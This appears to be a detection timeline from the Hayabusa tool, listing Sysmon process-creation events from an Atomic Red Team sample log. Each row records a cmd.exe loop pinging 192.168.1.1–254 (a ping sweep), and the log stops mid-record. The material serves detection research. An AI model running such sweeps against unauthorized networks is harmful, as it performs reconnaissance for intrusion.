2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 
